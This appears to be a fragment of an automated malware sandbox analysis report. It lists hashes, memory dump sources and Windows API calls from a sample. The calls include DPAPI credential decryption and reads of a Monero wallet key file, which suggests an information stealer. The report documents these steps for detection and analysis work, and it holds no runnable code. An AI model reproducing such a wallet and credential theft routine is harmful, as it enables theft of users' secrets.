                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: 8079d0d527583c771c87b00288c82929b4e212e162e1b858fd5951af01c45f40
                  • Instruction ID: 35ae0bdf59a54a81c5c5b65fd114db1b9f6f3f535c3f3715c9062412727f3bd5
                  • Opcode Fuzzy Hash: 8079d0d527583c771c87b00288c82929b4e212e162e1b858fd5951af01c45f40
                  • Instruction Fuzzy Hash: C341C771A40A289FDB24DB58CC95F9BB7B5BB48702F4081D8E609A72D0D7B16E85CF50
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00929B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00929BA3
                  • LocalFree.KERNEL32(?), ref: 00929BD3
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: c43d85f0bdbda3e90c9685c53d37569e57d3c9ef86b9af6b272977dd8d650522
                  • Instruction ID: abb01636e3a4dd24a37502e5c636cadbd7101842a8f5b1d379adf9c51d78d84e
                  • Opcode Fuzzy Hash: c43d85f0bdbda3e90c9685c53d37569e57d3c9ef86b9af6b272977dd8d650522
                  • Instruction Fuzzy Hash: 5711CCB4A00209EFCB04DF94D985AAE77F9FF88300F104568E915A7390D774AE10CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 98yW$S}_$Kw
                  • API String ID: 0-2100450784
                  • Opcode ID: c9bd3b2aad855f845c5aa5e1fd8bb37f6d5c88890f364cd16d4da65997788de0
                  • Instruction ID: f4107d8e52e99c8bf7f6c16c008206336cc7aca448cf5489e0ea88f4e1dfa27e
                  • Opcode Fuzzy Hash: c9bd3b2aad855f845c5aa5e1fd8bb37f6d5c88890f364cd16d4da65997788de0
                  • Instruction Fuzzy Hash: 675148F36083004BE3086E2DECA533ABBD6DFD4720F1AC53DE6C587788E97858458646
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ^V:E$flV
                  • API String ID: 0-96964855
                  • Opcode ID: fe39305e1a1e37a43dc20f3e961d7128260ae664759defd743b80db251878e5c
                  • Instruction ID: 42c7f0ffc3a57493b41bfb9d53c29405e21672528cebe562a295a5fe3b32be02
                  • Opcode Fuzzy Hash: fe39305e1a1e37a43dc20f3e961d7128260ae664759defd743b80db251878e5c
                  • Instruction Fuzzy Hash: E08158F3A0C604AFD3186F2DDC8162AFBE6EBD8720F1A492DE6C4C3754F93559008646
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 5n$lH=
                  • API String ID: 0-2859898692
                  • Opcode ID: f7849f199b605acb260e738fc3ca1cb61b1c1e7c77634a2805218c67e3789f73
                  • Instruction ID: 0cad71b79b825f24c36c97a8e7797240918c43b68e22631fdf65e366f3a6fd5e
                  • Opcode Fuzzy Hash: f7849f199b605acb260e738fc3ca1cb61b1c1e7c77634a2805218c67e3789f73
                  • Instruction Fuzzy Hash: 5F614AB3A082045FE314AE2DDC8577BBBD6EBD4320F1A4A3DEAC883744E53658058386
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1w}$bMl
                  • API String ID: 0-1890219203
                  • Opcode ID: 5d3d91622d075c746c1e1eedcd7f10b6a457e466c0a10300c72bbb4a49097f26
                  • Instruction ID: f7d4acd4f87416f3f625af74c241009f3982e405dbbfb0c78f05eeda0e2d4ad1
                  • Opcode Fuzzy Hash: 5d3d91622d075c746c1e1eedcd7f10b6a457e466c0a10300c72bbb4a49097f26
                  • Instruction Fuzzy Hash: 61811AF3D082148BE304AE3DDD4577ABBE6DB94720F1A4A3DD9C4C7788E93988458782
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: L$}
                  • API String ID: 0-3268990791
                  • Opcode ID: b90d8b9642d08c0b100b5d6c03769e67a25c5f00ea3ae84b792921d0df5687b0
                  • Instruction ID: def1ef54cb822d16de496cda239b1e7d717d6bdf20bbc3d6776734d938ca13cc
                  • Opcode Fuzzy Hash: b90d8b9642d08c0b100b5d6c03769e67a25c5f00ea3ae84b792921d0df5687b0
                  • Instruction Fuzzy Hash: BC72E7F3A082109FE304AE2DDC8577AFBE9EF94720F16853DEAC4C7744E63598058696
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: X)q
                  • API String ID: 0-2881036112
                  • Opcode ID: 3e61f05c2a7b41bfb05419aaae805989f3e9704a11edf8b513d8f15194ff2edd
                  • Instruction ID: d896d6efddbdd426b71936f34a9b83bbf4bd251855291cdc35a8290c4b5f01e4
                  • Opcode Fuzzy Hash: 3e61f05c2a7b41bfb05419aaae805989f3e9704a11edf8b513d8f15194ff2edd
                  • Instruction Fuzzy Hash: E86158F3E082105BE314597DECC576AB6D9EBA4320F1B463DEE88E3380E9799C0542D2
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 519d7e9de7c277a7bd3e388c8c461a0347e35bd0e6c770b30635abc7e8aa67ba
                  • Instruction ID: 4b6868b581e05798c035991d970908cc09bcb37299fbb231d2b39e62d5af9edd
                  • Opcode Fuzzy Hash: 519d7e9de7c277a7bd3e388c8c461a0347e35bd0e6c770b30635abc7e8aa67ba
                  • Instruction Fuzzy Hash: 6851F7F3E081105BF310A92DEC857AAB7D6DBD4320F2B813DDBD897784E939580586D6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea2d2c76ef6c924e344fa714a89fd0b4b77603deaae7bf6bbbe9a6332034a461
                  • Instruction ID: 3ee42633e333465260b4fe0d43e3cc23b2d01ed7068f9e73ec93b6314509e5f6
                  • Opcode Fuzzy Hash: ea2d2c76ef6c924e344fa714a89fd0b4b77603deaae7bf6bbbe9a6332034a461
                  • Instruction Fuzzy Hash: A3514CF3A082105FE3185E39ECD477AB6D6E7C4320F2B863DE999D7784D9795C018292
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 67d54f5212e06118d1ea6089c86eca7684cba9384deb9fa695e835b4148f03d9
                  • Instruction ID: 7152cca07d07da8edb55c824c2a8b7281e2c1a01a3c48e53a3b2322165925084
                  • Opcode Fuzzy Hash: 67d54f5212e06118d1ea6089c86eca7684cba9384deb9fa695e835b4148f03d9
                  • Instruction Fuzzy Hash: 925125F3A092009FF708AE38DC9673AB7D5EB84320F16463DEAD5C77C4D93958018696
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ade99226b0a84389e750a6ece98b9c844a3bf4e21cd33a6b9a748960c330a90a
                  • Instruction ID: 126e014348d4cc1d7a07fde716361eaea0c429fce13020978f555463a0f3df48
                  • Opcode Fuzzy Hash: ade99226b0a84389e750a6ece98b9c844a3bf4e21cd33a6b9a748960c330a90a
                  • Instruction Fuzzy Hash: 804122B3E082109BE304593DEC8833BB6DADBD4720F2B463EEA8497384E9749C0586D5
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4a2847dc9c2be19a5224be93458c6afbfc36b15f2622797cc0d4dd959a6fcfcf
                  • Instruction ID: 15b01d9ddc805ff73bd84d945e046b5299d8f983ac0f9fd8af6efa5eaf5976bd
                  • Opcode Fuzzy Hash: 4a2847dc9c2be19a5224be93458c6afbfc36b15f2622797cc0d4dd959a6fcfcf
                  • Instruction Fuzzy Hash: F6316FB290C6109FE315AE19DC85BAAFBE6FFD8760F16882DE7C483610E63554408A97
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
